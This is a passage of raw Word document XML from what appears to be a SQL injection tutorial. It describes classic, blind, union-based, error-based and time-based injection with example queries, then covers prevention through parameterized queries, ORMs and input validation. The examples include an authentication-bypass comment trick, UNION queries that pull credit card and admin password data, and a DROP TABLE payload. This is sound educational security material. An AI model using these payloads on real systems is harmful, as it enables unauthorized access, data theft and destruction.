          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Input</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The attacker provides malicious input that is designed to alter the structure or logic of an SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B5DF7" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The application incorporates this input into an SQL query without proper validation or sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770A4FE" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Malicious Query Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The database executes the altered SQL query, which can perform unintended actions or reveal sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776A36D" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Types of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D686FCD" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Classic SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A95F832"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Directly injecting malicious SQL code into a query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F5F25"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Modifying a login form to include SQL code that bypasses authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1E522"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Query Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F91DC7E"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SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C493FB" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If the application doesn't handle this input correctly, it could log in the attacker as an admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DE597" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240DB0CB"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The attacker does not see the results of the query directly but infers information based on the application's behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C44148B"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Asking yes/no questions to infer whether a specific piece of information is present in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD4E633"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Query Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68406681"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SELECT * FROM users WHERE id = 1 AND SUBSTRING(@@version,1,1) = '5';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A95701" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Union-Based SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B89AB"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Using the UNION SQL operator to combine results from multiple queries, allowing the attacker to retrieve data from other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D49D3"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Extracting data from additional tables by injecting a UNION query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6024A"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Query Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3AC0A"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SELECT id, name FROM users WHERE id = 1 UNION SELECT credit_card_number, expiration_date FROM payments;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770BE32E" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-Based SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E175CF7"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Exploiting database error messages to gain insight into the structure of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01562FF3"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Inducing errors to retrieve detailed database error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A23F0"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Query Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417830EA"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SELECT * FROM users WHERE id = 1 AND 1=CONVERT(int, (SELECT @@version));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF94771" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Time-Based Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08368A01"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Using SQL queries that cause delays to infer information based on the time it takes for the server to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58F493"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Sending queries that use SLEEP() or WAITFOR DELAY() functions to determine the presence of certain data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB6553" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBE66E"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SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383C172" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Examples of SQL Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A10C71" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Authentication Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193D46E"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SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F496916" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This query bypasses authentication by commenting out the rest of the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5144D6" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Theft</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0098B"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SELECT * FROM users WHERE id = 1 UNION SELECT username, password FROM admin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AACC12" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This query retrieves usernames and passwords from the admin table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363BFAE" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B22E2"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INSERT INTO users (username, password) VALUES ('attacker', 'password'); DROP TABLE users; --';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745EF2D" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This query inserts a new user and then drops the users table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5583C" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Preventing SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46A2D5" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Prepared Statements and Parameterized Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E17F39"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Prepared statements and parameterized queries ensure that user input is treated as data, not executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA903D"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Using parameterized queries with libraries like pg for PostgreSQL or mysql2 for MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F98DC"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Using parameterized queries with Node.js and `mysql2`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A7E2CD"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connection.query('SELECT * FROM users WHERE username = ? AND password = ?', [username, password], (error, results) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB492C3"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if (error) throw error;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F16D5"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 xml:space="preserve">  // Handle results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCBDAF8" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C4405" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use ORM Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA4B43"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Object-Relational Mapping (ORM) libraries abstract SQL queries and handle user input safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355FBD8"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Libraries like Sequelize or TypeORM automatically handle parameterization and escaping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB5147" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sanitize and Validate User Inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59F965"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Ensure that all user inputs are validated for type, length, format, and range before using them in SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1610B"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Use libraries like validator to validate input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4DC88" w14:textId="77777777" w:rsidR="000C4CCC" w:rsidRPr="00DA2F32" w:rsidRDefault="000C4CCC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
